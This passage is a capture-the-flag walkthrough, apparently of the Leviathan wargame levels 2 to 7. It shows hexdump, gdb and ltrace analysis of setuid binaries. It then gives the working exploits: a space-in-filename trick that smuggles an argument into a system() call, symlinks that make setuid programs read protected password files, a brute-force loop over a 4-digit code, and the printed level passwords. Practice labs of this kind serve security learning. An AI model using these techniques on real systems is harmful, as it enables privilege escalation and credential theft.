00001370  06 00 00 00 30 84 04 08  30 04 00 00 42 02 00 00  |....0...0...B...|
00001380  00 00 00 00 00 00 00 00  10 00 00 00 00 00 00 00  |................|
00001390  98 00 00 00 01 00 00 00  06 00 00 00 74 86 04 08  |............t...|
000013a0  74 06 00 00 14 00 00 00  00 00 00 00 00 00 00 00  |t...............|
000013b0  04 00 00 00 00 00 00 00  9e 00 00 00 01 00 00 00  |................|
000013c0  02 00 00 00 88 86 04 08  88 06 00 00 58 00 00 00  |............X...|
000013d0  00 00 00 00 00 00 00 00  04 00 00 00 00 00 00 00  |................|
000013e0  a6 00 00 00 01 00 00 00  02 00 00 00 e0 86 04 08  |................|
000013f0  e0 06 00 00 2c 00 00 00  00 00 00 00 00 00 00 00  |....,...........|
00001400  04 00 00 00 00 00 00 00  b4 00 00 00 01 00 00 00  |................|
00001410  02 00 00 00 0c 87 04 08  0c 07 00 00 b0 00 00 00  |................|
00001420  00 00 00 00 00 00 00 00  04 00 00 00 00 00 00 00  |................|
00001430  be 00 00 00 0e 00 00 00  03 00 00 00 08 9f 04 08  |................|
00001440  08 0f 00 00 04 00 00 00  00 00 00 00 00 00 00 00  |................|
00001450  04 00 00 00 00 00 00 00  ca 00 00 00 0f 00 00 00  |................|
00001460  03 00 00 00 0c 9f 04 08  0c 0f 00 00 04 00 00 00  |................|
00001470  00 00 00 00 00 00 00 00  04 00 00 00 00 00 00 00  |................|
00001480  d6 00 00 00 01 00 00 00  03 00 00 00 10 9f 04 08  |................|
00001490  10 0f 00 00 04 00 00 00  00 00 00 00 00 00 00 00  |................|
000014a0  04 00 00 00 00 00 00 00  db 00 00 00 06 00 00 00  |................|
000014b0  03 00 00 00 14 9f 04 08  14 0f 00 00 e8 00 00 00  |................|
000014c0  06 00 00 00 00 00 00 00  04 00 00 00 08 00 00 00  |................|
000014d0  e4 00 00 00 01 00 00 00  03 00 00 00 fc 9f 04 08  |................|
000014e0  fc 0f 00 00 04 00 00 00  00 00 00 00 00 00 00 00  |................|
000014f0  04 00 00 00 04 00 00 00  e9 00 00 00 01 00 00 00  |................|
00001500  03 00 00 00 00 a0 04 08  00 10 00 00 2c 00 00 00  |............,...|
00001510  00 00 00 00 00 00 00 00  04 00 00 00 04 00 00 00  |................|
00001520  f2 00 00 00 01 00 00 00  03 00 00 00 2c a0 04 08  |............,...|
00001530  2c 10 00 00 08 00 00 00  00 00 00 00 00 00 00 00  |,...............|
00001540  04 00 00 00 00 00 00 00  f8 00 00 00 08 00 00 00  |................|
00001550  03 00 00 00 34 a0 04 08  34 10 00 00 04 00 00 00  |....4...4.......|
00001560  00 00 00 00 00 00 00 00  01 00 00 00 00 00 00 00  |................|
00001570  fd 00 00 00 01 00 00 00  30 00 00 00 00 00 00 00  |........0.......|
00001580  34 10 00 00 24 00 00 00  00 00 00 00 00 00 00 00  |4...$...........|
00001590  01 00 00 00 01 00 00 00  11 00 00 00 03 00 00 00  |................|
000015a0  00 00 00 00 00 00 00 00  58 10 00 00 06 01 00 00  |........X.......|
000015b0  00 00 00 00 00 00 00 00  01 00 00 00 00 00 00 00  |................|
000015c0  01 00 00 00 02 00 00 00  00 00 00 00 00 00 00 00  |................|
000015d0  10 16 00 00 80 04 00 00  1d 00 00 00 2d 00 00 00  |............-...|
000015e0  04 00 00 00 10 00 00 00  09 00 00 00 03 00 00 00  |................|
000015f0  00 00 00 00 00 00 00 00  90 1a 00 00 ba 02 00 00  |................|
00001600  00 00 00 00 00 00 00 00  01 00 00 00 00 00 00 00  |................|
00001610  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00001620  00 00 00 00 54 81 04 08  00 00 00 00 03 00 01 00  |....T...........|
00001630  00 00 00 00 68 81 04 08  00 00 00 00 03 00 02 00  |....h...........|
00001640  00 00 00 00 88 81 04 08  00 00 00 00 03 00 03 00  |................|
00001650  00 00 00 00 ac 81 04 08  00 00 00 00 03 00 04 00  |................|
00001660  00 00 00 00 cc 81 04 08  00 00 00 00 03 00 05 00  |................|
00001670  00 00 00 00 6c 82 04 08  00 00 00 00 03 00 06 00  |....l...........|
00001680  00 00 00 00 e8 82 04 08  00 00 00 00 03 00 07 00  |................|
00001690  00 00 00 00 fc 82 04 08  00 00 00 00 03 00 08 00  |................|
000016a0  00 00 00 00 2c 83 04 08  00 00 00 00 03 00 09 00  |....,...........|
000016b0  00 00 00 00 34 83 04 08  00 00 00 00 03 00 0a 00  |....4...........|
000016c0  00 00 00 00 74 83 04 08  00 00 00 00 03 00 0b 00  |....t...........|
000016d0  00 00 00 00 a0 83 04 08  00 00 00 00 03 00 0c 00  |................|
000016e0  00 00 00 00 30 84 04 08  00 00 00 00 03 00 0d 00  |....0...........|
000016f0  00 00 00 00 74 86 04 08  00 00 00 00 03 00 0e 00  |....t...........|
00001700  00 00 00 00 88 86 04 08  00 00 00 00 03 00 0f 00  |................|
00001710  00 00 00 00 e0 86 04 08  00 00 00 00 03 00 10 00  |................|
00001720  00 00 00 00 0c 87 04 08  00 00 00 00 03 00 11 00  |................|
00001730  00 00 00 00 08 9f 04 08  00 00 00 00 03 00 12 00  |................|
00001740  00 00 00 00 0c 9f 04 08  00 00 00 00 03 00 13 00  |................|
00001750  00 00 00 00 10 9f 04 08  00 00 00 00 03 00 14 00  |................|
00001760  00 00 00 00 14 9f 04 08  00 00 00 00 03 00 15 00  |................|
00001770  00 00 00 00 fc 9f 04 08  00 00 00 00 03 00 16 00  |................|
00001780  00 00 00 00 00 a0 04 08  00 00 00 00 03 00 17 00  |................|
00001790  00 00 00 00 2c a0 04 08  00 00 00 00 03 00 18 00  |....,...........|
000017a0  00 00 00 00 34 a0 04 08  00 00 00 00 03 00 19 00  |....4...........|
000017b0  00 00 00 00 00 00 00 00  00 00 00 00 03 00 1a 00  |................|
000017c0  01 00 00 00 00 00 00 00  00 00 00 00 04 00 f1 ff  |................|
000017d0  0c 00 00 00 10 9f 04 08  00 00 00 00 01 00 14 00  |................|
000017e0  19 00 00 00 70 84 04 08  00 00 00 00 02 00 0d 00  |....p...........|
000017f0  2e 00 00 00 a0 84 04 08  00 00 00 00 02 00 0d 00  |................|
00001800  41 00 00 00 e0 84 04 08  00 00 00 00 02 00 0d 00  |A...............|
00001810  57 00 00 00 34 a0 04 08  01 00 00 00 01 00 19 00  |W...4...........|
00001820  66 00 00 00 0c 9f 04 08  00 00 00 00 01 00 13 00  |f...............|
00001830  8d 00 00 00 00 85 04 08  00 00 00 00 02 00 0d 00  |................|
00001840  99 00 00 00 08 9f 04 08  00 00 00 00 01 00 12 00  |................|
00001850  b8 00 00 00 00 00 00 00  00 00 00 00 04 00 f1 ff  |................|
00001860  01 00 00 00 00 00 00 00  00 00 00 00 04 00 f1 ff  |................|
00001870  c4 00 00 00 b8 87 04 08  00 00 00 00 01 00 11 00  |................|
00001880  d2 00 00 00 10 9f 04 08  00 00 00 00 01 00 14 00  |................|
00001890  00 00 00 00 00 00 00 00  00 00 00 00 04 00 f1 ff  |................|
000018a0  de 00 00 00 0c 9f 04 08  00 00 00 00 00 00 12 00  |................|
000018b0  ef 00 00 00 14 9f 04 08  00 00 00 00 01 00 15 00  |................|
000018c0  f8 00 00 00 08 9f 04 08  00 00 00 00 00 00 12 00  |................|
000018d0  0b 01 00 00 00 a0 04 08  00 00 00 00 01 00 17 00  |................|
000018e0  21 01 00 00 70 86 04 08  02 00 00 00 12 00 0d 00  |!...p...........|
000018f0  31 01 00 00 00 00 00 00  00 00 00 00 20 00 00 00  |1........... ...|
00001900  4d 01 00 00 60 84 04 08  04 00 00 00 12 02 0d 00  |M...`...........|
00001910  63 01 00 00 2c a0 04 08  00 00 00 00 20 00 18 00  |c...,....... ...|
00001920  6e 01 00 00 00 00 00 00  00 00 00 00 12 00 00 00  |n...............|
00001930  80 01 00 00 34 a0 04 08  00 00 00 00 10 00 18 00  |....4...........|
00001940  87 01 00 00 74 86 04 08  00 00 00 00 12 00 0e 00  |....t...........|
00001950  8d 01 00 00 00 00 00 00  00 00 00 00 12 00 00 00  |................|
00001960  a9 01 00 00 2c a0 04 08  00 00 00 00 10 00 18 00  |....,...........|
00001970  b6 01 00 00 00 00 00 00  00 00 00 00 12 00 00 00  |................|
00001980  c6 01 00 00 00 00 00 00  00 00 00 00 12 00 00 00  |................|
00001990  d8 01 00 00 00 00 00 00  00 00 00 00 20 00 00 00  |............ ...|
000019a0  e7 01 00 00 30 a0 04 08  00 00 00 00 11 02 18 00  |....0...........|
000019b0  f4 01 00 00 8c 86 04 08  04 00 00 00 11 00 0f 00  |................|
000019c0  03 02 00 00 00 00 00 00  00 00 00 00 12 00 00 00  |................|
000019d0  20 02 00 00 00 86 04 08  61 00 00 00 12 00 0d 00  | .......a.......|
000019e0  30 02 00 00 00 00 00 00  00 00 00 00 12 00 00 00  |0...............|
000019f0  44 02 00 00 38 a0 04 08  00 00 00 00 10 00 19 00  |D...8...........|
00001a00  49 02 00 00 30 84 04 08  00 00 00 00 12 00 0d 00  |I...0...........|
00001a10  50 02 00 00 88 86 04 08  04 00 00 00 11 00 0f 00  |P...............|
00001a20  57 02 00 00 00 00 00 00  00 00 00 00 12 00 00 00  |W...............|
00001a30  69 02 00 00 34 a0 04 08  00 00 00 00 10 00 19 00  |i...4...........|
00001a40  75 02 00 00 2d 85 04 08  d2 00 00 00 12 00 0d 00  |u...-...........|
00001a50  7a 02 00 00 00 00 00 00  00 00 00 00 20 00 00 00  |z........... ...|
00001a60  8e 02 00 00 34 a0 04 08  00 00 00 00 11 02 18 00  |....4...........|
00001a70  9a 02 00 00 00 00 00 00  00 00 00 00 20 00 00 00  |............ ...|
00001a80  b4 02 00 00 74 83 04 08  00 00 00 00 12 00 0b 00  |....t...........|
00001a90  00 63 72 74 73 74 75 66  66 2e 63 00 5f 5f 4a 43  |.crtstuff.c.__JC|
00001aa0  52 5f 4c 49 53 54 5f 5f  00 64 65 72 65 67 69 73  |R_LIST__.deregis|
00001ab0  74 65 72 5f 74 6d 5f 63  6c 6f 6e 65 73 00 72 65  |ter_tm_clones.re|
00001ac0  67 69 73 74 65 72 5f 74  6d 5f 63 6c 6f 6e 65 73  |gister_tm_clones|
00001ad0  00 5f 5f 64 6f 5f 67 6c  6f 62 61 6c 5f 64 74 6f  |.__do_global_dto|
00001ae0  72 73 5f 61 75 78 00 63  6f 6d 70 6c 65 74 65 64  |rs_aux.completed|
00001af0  2e 36 35 39 30 00 5f 5f  64 6f 5f 67 6c 6f 62 61  |.6590.__do_globa|
00001b00  6c 5f 64 74 6f 72 73 5f  61 75 78 5f 66 69 6e 69  |l_dtors_aux_fini|
00001b10  5f 61 72 72 61 79 5f 65  6e 74 72 79 00 66 72 61  |_array_entry.fra|
00001b20  6d 65 5f 64 75 6d 6d 79  00 5f 5f 66 72 61 6d 65  |me_dummy.__frame|
00001b30  5f 64 75 6d 6d 79 5f 69  6e 69 74 5f 61 72 72 61  |_dummy_init_arra|
00001b40  79 5f 65 6e 74 72 79 00  70 72 69 6e 74 66 69 6c  |y_entry.printfil|
00001b50  65 2e 63 00 5f 5f 46 52  41 4d 45 5f 45 4e 44 5f  |e.c.__FRAME_END_|
00001b60  5f 00 5f 5f 4a 43 52 5f  45 4e 44 5f 5f 00 5f 5f  |_.__JCR_END__.__|
00001b70  69 6e 69 74 5f 61 72 72  61 79 5f 65 6e 64 00 5f  |init_array_end._|
00001b80  44 59 4e 41 4d 49 43 00  5f 5f 69 6e 69 74 5f 61  |DYNAMIC.__init_a|
00001b90  72 72 61 79 5f 73 74 61  72 74 00 5f 47 4c 4f 42  |rray_start._GLOB|
00001ba0  41 4c 5f 4f 46 46 53 45  54 5f 54 41 42 4c 45 5f  |AL_OFFSET_TABLE_|
00001bb0  00 5f 5f 6c 69 62 63 5f  63 73 75 5f 66 69 6e 69  |.__libc_csu_fini|
00001bc0  00 5f 49 54 4d 5f 64 65  72 65 67 69 73 74 65 72  |._ITM_deregister|
00001bd0  54 4d 43 6c 6f 6e 65 54  61 62 6c 65 00 5f 5f 78  |TMCloneTable.__x|
00001be0  38 36 2e 67 65 74 5f 70  63 5f 74 68 75 6e 6b 2e  |86.get_pc_thunk.|
00001bf0  62 78 00 64 61 74 61 5f  73 74 61 72 74 00 70 72  |bx.data_start.pr|
00001c00  69 6e 74 66 40 40 47 4c  49 42 43 5f 32 2e 30 00  |intf@@GLIBC_2.0.|
00001c10  5f 65 64 61 74 61 00 5f  66 69 6e 69 00 5f 5f 73  |_edata._fini.__s|
00001c20  74 61 63 6b 5f 63 68 6b  5f 66 61 69 6c 40 40 47  |tack_chk_fail@@G|
00001c30  4c 49 42 43 5f 32 2e 34  00 5f 5f 64 61 74 61 5f  |LIBC_2.4.__data_|
00001c40  73 74 61 72 74 00 70 75  74 73 40 40 47 4c 49 42  |start.puts@@GLIB|
00001c50  43 5f 32 2e 30 00 73 79  73 74 65 6d 40 40 47 4c  |C_2.0.system@@GL|
00001c60  49 42 43 5f 32 2e 30 00  5f 5f 67 6d 6f 6e 5f 73  |IBC_2.0.__gmon_s|
00001c70  74 61 72 74 5f 5f 00 5f  5f 64 73 6f 5f 68 61 6e  |tart__.__dso_han|
00001c80  64 6c 65 00 5f 49 4f 5f  73 74 64 69 6e 5f 75 73  |dle._IO_stdin_us|
00001c90  65 64 00 5f 5f 6c 69 62  63 5f 73 74 61 72 74 5f  |ed.__libc_start_|
00001ca0  6d 61 69 6e 40 40 47 4c  49 42 43 5f 32 2e 30 00  |main@@GLIBC_2.0.|
00001cb0  5f 5f 6c 69 62 63 5f 63  73 75 5f 69 6e 69 74 00  |__libc_csu_init.|
00001cc0  73 6e 70 72 69 6e 74 66  40 40 47 4c 49 42 43 5f  |snprintf@@GLIBC_|
00001cd0  32 2e 30 00 5f 65 6e 64  00 5f 73 74 61 72 74 00  |2.0._end._start.|
00001ce0  5f 66 70 5f 68 77 00 61  63 63 65 73 73 40 40 47  |_fp_hw.access@@G|
00001cf0  4c 49 42 43 5f 32 2e 30  00 5f 5f 62 73 73 5f 73  |LIBC_2.0.__bss_s|
00001d00  74 61 72 74 00 6d 61 69  6e 00 5f 4a 76 5f 52 65  |tart.main._Jv_Re|
00001d10  67 69 73 74 65 72 43 6c  61 73 73 65 73 00 5f 5f  |gisterClasses.__|
00001d20  54 4d 43 5f 45 4e 44 5f  5f 00 5f 49 54 4d 5f 72  |TMC_END__._ITM_r|
00001d30  65 67 69 73 74 65 72 54  4d 43 6c 6f 6e 65 54 61  |egisterTMCloneTa|
00001d40  62 6c 65 00 5f 69 6e 69  74 00                    |ble._init.|
00001d4a
leviathan2@melinda:~$ 
leviathan2@melinda:~$ gdb ./printfile -q
Reading symbols from ./printfile...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
   0x0804852d <+0>:     push   ebp
   0x0804852e <+1>:     mov    ebp,esp
   0x08048530 <+3>:     and    esp,0xfffffff0
   0x08048533 <+6>:     sub    esp,0x230
   0x08048539 <+12>:    mov    eax,DWORD PTR [ebp+0xc]
   0x0804853c <+15>:    mov    DWORD PTR [esp+0x1c],eax
   0x08048540 <+19>:    mov    eax,gs:0x14
   0x08048546 <+25>:    mov    DWORD PTR [esp+0x22c],eax
   0x0804854d <+32>:    xor    eax,eax
   0x0804854f <+34>:    cmp    DWORD PTR [ebp+0x8],0x1
   0x08048553 <+38>:    jg     0x804857e <main+81>
   0x08048555 <+40>:    mov    DWORD PTR [esp],0x8048690
   0x0804855c <+47>:    call   0x80483d0 <puts@plt>
   0x08048561 <+52>:    mov    eax,DWORD PTR [esp+0x1c]
   0x08048565 <+56>:    mov    eax,DWORD PTR [eax]
   0x08048567 <+58>:    mov    DWORD PTR [esp+0x4],eax
   0x0804856b <+62>:    mov    DWORD PTR [esp],0x80486a5
   0x08048572 <+69>:    call   0x80483b0 <printf@plt>
   0x08048577 <+74>:    mov    eax,0xffffffff
   0x0804857c <+79>:    jmp    0x80485e8 <main+187>
   0x0804857e <+81>:    mov    eax,DWORD PTR [esp+0x1c]
   0x08048582 <+85>:    add    eax,0x4
   0x08048585 <+88>:    mov    eax,DWORD PTR [eax]
   0x08048587 <+90>:    mov    DWORD PTR [esp+0x4],0x4
   0x0804858f <+98>:    mov    DWORD PTR [esp],eax
   0x08048592 <+101>:   call   0x8048420 <access@plt>
   0x08048597 <+106>:   test   eax,eax
   0x08048599 <+108>:   je     0x80485ae <main+129>
   0x0804859b <+110>:   mov    DWORD PTR [esp],0x80486b9
   0x080485a2 <+117>:   call   0x80483d0 <puts@plt>
   0x080485a7 <+122>:   mov    eax,0x1
   0x080485ac <+127>:   jmp    0x80485e8 <main+187>
   0x080485ae <+129>:   mov    eax,DWORD PTR [esp+0x1c]
   0x080485b2 <+133>:   add    eax,0x4
   0x080485b5 <+136>:   mov    eax,DWORD PTR [eax]
   0x080485b7 <+138>:   mov    DWORD PTR [esp+0xc],eax
   0x080485bb <+142>:   mov    DWORD PTR [esp+0x8],0x80486d4
   0x080485c3 <+150>:   mov    DWORD PTR [esp+0x4],0x1ff
   0x080485cb <+158>:   lea    eax,[esp+0x2c]
   0x080485cf <+162>:   mov    DWORD PTR [esp],eax
   0x080485d2 <+165>:   call   0x8048410 <snprintf@plt>
   0x080485d7 <+170>:   lea    eax,[esp+0x2c]
   0x080485db <+174>:   mov    DWORD PTR [esp],eax
   0x080485de <+177>:   call   0x80483e0 <system@plt>
   0x080485e3 <+182>:   mov    eax,0x0
   0x080485e8 <+187>:   mov    edx,DWORD PTR [esp+0x22c]
   0x080485ef <+194>:   xor    edx,DWORD PTR gs:0x14
   0x080485f6 <+201>:   je     0x80485fd <main+208>
   0x080485f8 <+203>:   call   0x80483c0 <__stack_chk_fail@plt>
   0x080485fd <+208>:   leave
   0x080485fe <+209>:   ret
End of assembler dump.
(gdb) quit
leviathan2@melinda:~$
leviathan2@melinda:/$ cat /tmp/kanishka
This is a test file.
leviathan2@melinda:~$ ltrace ./printfile /tmp/kanishka
__libc_start_main(0x804852d, 2, 0xffffd774, 0x8048600 <unfinished ...>
access("/tmp/kanishka", 4)                                                                                                                         = 0
snprintf("/bin/cat /tmp/kanishka", 511, "/bin/cat %s", "/tmp/kanishka")                                                                            = 22
system("/bin/cat /tmp/kanishka"This is a test file.
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                                                                             = 0
+++ exited (status 0) +++
leviathan2@melinda:~$
access call dereferences the symlink, so symlinks will not work
So exploit spaces
leviathan2@melinda:~$ ln -s /etc/leviathan_pass/leviathan3 /tmp/pass0flevel3
leviathan2@melinda:~$ touch /tmp/pass0flevel3\ other
leviathan2@melinda:~$ ./printfile /tmp/pass0flevel3\ other
Ahdiemoo1j
/bin/cat: other: No such file or directory
leviathan2@melinda:~$

Leviathan Level 3 → Level 4
Login -> leviathan3
Password -> Ahdiemoo1j
leviathan3@melinda:~$ ls -lah
total 32K
drwxr-xr-x   2 root       root       4.0K Mar 21  2015 .
drwxr-xr-x 167 root       root       4.0K Jul  9  2015 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan4 leviathan3 9.8K Mar 21  2015 level3
leviathan3@melinda:~$ ./level3
Enter the password> test
bzzzzzzzzap. WRONG
leviathan3@melinda:~$ file level3
level3: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=9ee1bc84cc2a39de9df95a77cb807136b1ba6db2, not stripped
leviathan3@melinda:~$
leviathan3@melinda:~$ gdb ./level3 -q
Reading symbols from ./level3...done.
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
   0x080485fe <+0>:     push   ebp
   0x080485ff <+1>:     mov    ebp,esp
   0x08048601 <+3>:     and    esp,0xfffffff0
   0x08048604 <+6>:     sub    esp,0x50
   0x08048607 <+9>:     mov    eax,gs:0x14
   0x0804860d <+15>:    mov    DWORD PTR [esp+0x4c],eax
   0x08048611 <+19>:    xor    eax,eax
   0x08048613 <+21>:    mov    DWORD PTR [esp+0x23],0x626d6f62
   0x0804861b <+29>:    mov    WORD PTR [esp+0x27],0x6461
   0x08048622 <+36>:    mov    BYTE PTR [esp+0x29],0x0
   0x08048627 <+41>:    mov    DWORD PTR [esp+0x38],0x732e2e2e
   0x0804862f <+49>:    mov    DWORD PTR [esp+0x3c],0x33726333
   0x08048637 <+57>:    mov    WORD PTR [esp+0x40],0x74
   0x0804863e <+64>:    mov    DWORD PTR [esp+0x2a],0x6f6e3068
   0x08048646 <+72>:    mov    WORD PTR [esp+0x2e],0x3333
   0x0804864d <+79>:    mov    BYTE PTR [esp+0x30],0x0
   0x08048652 <+84>:    mov    DWORD PTR [esp+0x31],0x616b616b
   0x0804865a <+92>:    mov    WORD PTR [esp+0x35],0x616b
   0x08048661 <+99>:    mov    BYTE PTR [esp+0x37],0x0
   0x08048666 <+104>:   mov    DWORD PTR [esp+0x42],0x2e32332a
   0x0804866e <+112>:   mov    DWORD PTR [esp+0x46],0x785b2a32
   0x08048676 <+120>:   mov    WORD PTR [esp+0x4a],0x5d
   0x0804867d <+127>:   lea    eax,[esp+0x31]
   0x08048681 <+131>:   mov    DWORD PTR [esp+0x4],eax
   0x08048685 <+135>:   lea    eax,[esp+0x2a]
   0x08048689 <+139>:   mov    DWORD PTR [esp],eax
   0x0804868c <+142>:   call   0x80483d0 <strcmp@plt>
   0x08048691 <+147>:   test   eax,eax
   0x08048693 <+149>:   jne    0x804869d <main+159>
   0x08048695 <+151>:   mov    DWORD PTR [esp+0x1c],0x1
   0x0804869d <+159>:   mov    DWORD PTR [esp],0x804878f
   0x080486a4 <+166>:   call   0x80483e0 <printf@plt>
   0x080486a9 <+171>:   call   0x804854d <do_stuff>
   0x080486ae <+176>:   mov    eax,0x0
   0x080486b3 <+181>:   mov    edx,DWORD PTR [esp+0x4c]
   0x080486b7 <+185>:   xor    edx,DWORD PTR gs:0x14
   0x080486be <+192>:   je     0x80486c5 <main+199>
   0x080486c0 <+194>:   call   0x8048400 <__stack_chk_fail@plt>
   0x080486c5 <+199>:   leave
   0x080486c6 <+200>:   ret
End of assembler dump.
(gdb) quit
leviathan3@melinda:~$ ltrace ./level3
__libc_start_main(0x80485fe, 1, 0xffffd7a4, 0x80486d0 <unfinished ...>
strcmp("h0no33", "kakaka")                                                                                                                         = -1
printf("Enter the password> ")                                                                                                                     = 20
fgets(Enter the password> test
"test\n", 256, 0xf7fcbc20)                                                                                                                   = 0xffffd59c
strcmp("test\n", "snlprintf\n")                                                                                                                    = 1
puts("bzzzzzzzzap. WRONG"bzzzzzzzzap. WRONG
)                                                                                                                         = 19
+++ exited (status 0) +++
leviathan3@melinda:~$ ./level3
Enter the password> snlprintf
[You've got shell]!
$ id
uid=12003(leviathan3) gid=12003(leviathan3) euid=12004(leviathan4) groups=12004(leviathan4),12003(leviathan3)
$ whoami
leviathan4
$ cat /etc/leviathan_pass/leviathan4
vuH0coox6m
$

Leviathan Level 4 → Level 5
Login -> leviathan4
Password -> vuH0coox6m
leviathan4@melinda:~$ ls -lah
total 24K
drwxr-xr-x   3 root root       4.0K Nov 14  2014 .
drwxr-xr-x 167 root root       4.0K Jul  9  2015 ..
-rw-r--r--   1 root root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root root        675 Apr  9  2014 .profile
dr-xr-x---   2 root leviathan4 4.0K Nov 14  2014 .trash
leviathan4@melinda:~$ cd .trash/
leviathan4@melinda:~/.trash$ ls -lah
total 16K
dr-xr-x--- 2 root       leviathan4 4.0K Nov 14  2014 .
drwxr-xr-x 3 root       root       4.0K Nov 14  2014 ..
-r-sr-x--- 1 leviathan5 leviathan4 7.3K Nov 14  2014 bin
leviathan4@melinda:~/.trash$ file bin
bin: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=3be0f50b480c24c4223fc43cca29ab377e140fc7, not stripped
leviathan4@melinda:~/.trash$ ./bin
01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010
http://www.binaryhexconverter.com/binary-to-ascii-text-converter
Binary Value -> 
01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010
ASCII value ->
Tith4cokei

Leviathan Level 5 → Level 6
Login -> leviathan5
Password -> Tith4cokei
leviathan5@melinda:~$ ls -lah
total 28K
drwxr-xr-x   2 root       root       4.0K Nov 14  2014 .
drwxr-xr-x 167 root       root       4.0K Jul  9  2015 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan6 leviathan5 7.5K Nov 14  2014 leviathan5
leviathan5@melinda:~$ file leviathan5
leviathan5: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=c71b3ae0d0395851879ee6fb8ede92e1676ecf71, not stripped
leviathan5@melinda:~$ ./leviathan5
Cannot find /tmp/file.log
leviathan5@melinda:~$ nano /tmp/file.log
leviathan5@melinda:~$ cat /tmp/file.log
Test file
leviathan5@melinda:~$ ./leviathan5 /tmp/file.log
Test file
leviathan5@melinda:~$ cat /tmp/file.log
cat: /tmp/file.log: No such file or directory
leviathan5@melinda:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
leviathan5@melinda:~$ ./leviathan5
UgaoFee4li
leviathan5@melinda:~$

Leviathan Level 6 → Level 7
Login -> leviathan6
Password -> UgaoFee4li
leviathan6@melinda:~$ ls -lah
total 28K
drwxr-xr-x   2 root       root       4.0K Nov 14  2014 .
drwxr-xr-x 167 root       root       4.0K Jul  9  2015 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan7 leviathan6 7.4K Nov 14  2014 leviathan6
leviathan6@melinda:~$ file leviathan6
leviathan6: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=477bdc2883903e1a94b335e173c9149bc2755ab8, not stripped
leviathan6@melinda:~$ ./leviathan6
usage: ./leviathan6 <4 digit code>
leviathan6@melinda:~$ ./leviathan6 4567
Wrong
leviathan6@melinda:~$ for i in $(seq 0 9999); do echo $i && ./leviathan6 $i > /dev/null; done
<trim>
7109
7110
7111
7112
7113
7114
7115
7116
7117
7118
7119
7120
7121
7122
7123
leviathan6@melinda:~$ ./leviathan6 7123
$ id
uid=12006(leviathan6) gid=12006(leviathan6) euid=12007(leviathan7) groups=12007(leviathan7),12006(leviathan6)
$ whoami
leviathan7
$ cat /etc/leviathan_pass/leviathan7
ahy7MaeBo9
$